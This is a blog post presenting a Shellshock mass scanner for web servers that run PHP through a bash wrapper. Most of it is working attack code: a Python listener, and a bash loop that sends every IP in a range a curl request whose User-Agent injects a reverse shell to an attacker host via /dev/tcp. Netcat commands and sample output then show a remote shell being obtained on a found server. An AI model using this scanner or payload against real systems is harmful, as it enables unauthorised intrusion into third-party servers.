This page looks best with JavaScript enabled

BashShock HTTP Scanner

 ·  🎃 kr0m

As we commented on a previous occasion, it is possible to exploit the bash shock bug on web servers if the execution of the PHP interpreter is done through a wrapper written in bash. However, first we must locate such servers. This time we will use exactly the same technique explained in the previous article, but this time we will not put a netcat on listening to collect the connection, but we will put a Python script that will show us which IPs are trying to connect. This way we will have a script that tries to take advantage of the vulnerability and another that will show where it has been successfully executed.

The script that we will put on listening is:

vi python_server_socket.py

import socket
s = socket.socket()
print "-- Socket successfully created"
port = 4141
s.bind(('', port))
print "-- Socket binded to %s" %(port)
s.listen(5)
print "-- Socket is listening"
while True:
    # Establish connection with client.
    c, addr = s.accept()
    print '-- Got connection from', addr
    c.close()
    print '-- Connection closed'

NOTE: This script will be put on listening on port 4141. If someone connects to this port, it will print the IP and close the connection.

The bug checking script is as follows:

#!/bin/bash
clear
echo -e "-----------------------------------------------"
echo -e "| BachShock HTTP Scanner v0.1b, coded by Kr0m |"
echo -e "-----------------------------------------------"
echo -e "++ Remember to put the listening script in the configured port"
echo -e "  python2.7 python_server_socket.py "
echo -e " "

if [ $# -ne 2 ]; then
        echo -e "-- Invalid number of arguments."
        echo -e "bashshock_http_scanner.sh FIRST_IP LAST_IP"
        echo -e " "
        exit
fi

HOST="192.168.20.1"
PORT="4141"

IP="$1"
IP2="$2"

STAT=1
STAT2=1

if [[ $IP =~ ^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}$ ]]; then
        OIFS=$IFS
        IFS='.'
        IP=($IP)
        IFS=$OIFS
        [[ ${IP[0]} -le 255 && ${IP[1]} -le 255 && ${IP[2]} -le 255 && ${IP[3]} -le 255 ]]
        STAT=$?
fi

if [ $STAT == '1' ]; then
        echo -e "-- First IP: $1 -- INVALID, aborting"
        exit
else
        echo -e "-- First IP: $1 -- VALID"
fi

if [[ $IP2 =~ ^[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}$ ]]; then
        OIFS=$IFS
        IFS='.'
        IP2=($IP2)
        IFS=$OIFS
        [[ ${IP2[0]} -le 255 && ${IP2[1]} -le 255 && ${IP2[2]} -le 255 && ${IP2[3]} -le 255 ]]
        STAT2=$?
fi

if [ $STAT2 == '1' ]; then
        echo -e "-- Second IP: $2 -- INVALID, aborting"
        exit
else
        echo -e "-- Second IP: $2 -- VALID"
fi

IFS=. read -r a b c d <<< "$1"
INT=$(printf '%d
' "$((a * 256 ** 3 + b * 256 ** 2 + c * 256 + d))")

IFS=. read -r a b c d <<< "$2"
INT2=$(printf '%d
' "$((a * 256 ** 3 + b * 256 ** 2 + c * 256 + d))")

#echo -e "-- INT: $INT"
#echo -e "-- INT2: $INT2"

if [ "$INT2" -ge "$INT" ]; then
        echo -e "-- Valid IP Range"
else
        echo -e "-- Invalid IP Range, aborting"
        exit
fi

echo -e " "

while [ $INT -le $INT2 ]; do
        A=$(echo -n $(($(($(($((${INT}/256))/256))/256))%256)).)
        B=$(echo -n $(($(($((${INT}/256))/256))%256)).)
        C=$(echo -n $(($((${INT}/256))%256)).)
        D=$(echo $((${INT}%256)))
        echo -e "=============================================================="
        echo -e "++ Scanning IP: $A$B$C$D"
        curl -m 6 -k -H 'User-Agent: () { :;}; /bin/bash -i >& /dev/tcp/'$HOST'/'$PORT' 0>&1' http://$A$B$C$D/ -s -o /dev/null &
        let INT=$INT+1
done
echo -e "=============================================================="

If the script finds any vulnerable server in the console where we have the Python, it will appear something like this:

-- Socket successfully created
-- Socket binded to 4141
-- Socket is listening
-- Got connection from ('192.168.20.27', 60223)
-- Connection closed

We can see how the server 192.168.20.27 is vulnerable to this attack, now we just rerun the attack as in the previous article and we have shell ;)

We put netcat on listening mode:

nc -l -p 8080

We exploit the vulnerability:

python2.7 bashshoc.py 192.168.20.27 /index.php 192.168.20.1/8080

In the shell with netcat, we receive the remote shell:

nc -l -p 8080
web_prueba@RX3 /var/www/bin/web_pruebas $

This script will only work if the server’s index file is interpreted through the wrapper. It may be the case that the index is an HTML file but has other parts written in PHP, for example.

If you liked the article, you can treat me to a RedBull here